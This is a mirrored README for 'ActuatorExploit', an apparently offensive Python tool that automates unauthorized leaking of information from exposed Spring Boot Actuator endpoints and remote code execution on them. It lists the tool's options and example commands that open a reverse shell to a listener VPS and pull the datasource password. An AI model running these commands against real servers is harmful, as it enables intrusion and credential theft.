Giter Site home page Giter Site logo

actuatorexploit's Introduction

ActuatorExploit

SpringBoot Actuator未授权自动化利用,支持信息泄漏/RCE

About

参考 https://github.com/LandGrey/SpringBootVulExploit
SpringBoot Actuator各种姿势的半自动化利用,landgrey师傅的项目中有的姿势都已集成

Usage

usage: ActuatorExploit.py [-h] [-t TARGET] [-w WAY] [-v VERSION] [-p VPS]
                          [-i INFO]

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target url, like http://127.0.0.1
  -w WAY, --way WAY     scan way, input leak/rce
  -v VERSION, --version VERSION
                        sb version, input 1/2, 2 is /actuator/xxx
  -p VPS, --vps VPS     listener vps ip
  -i INFO, --info INFO  info to leak

RCE:

python3 check.py -t http://127.0.0.1:9094 -w rce -v 1 -p vsp:1234

注1:snakeyaml利用需要的反弹shell exp见yaml-payload,运行1.sh即可编译。 注2:RR's exp

Leak:

python3 check.py -t http://127.0.0.1:9094 -w leak -v 1 -p vps:1234 -i spring.datasource.password

actuatorexploit's People

Contributors

lfysec avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.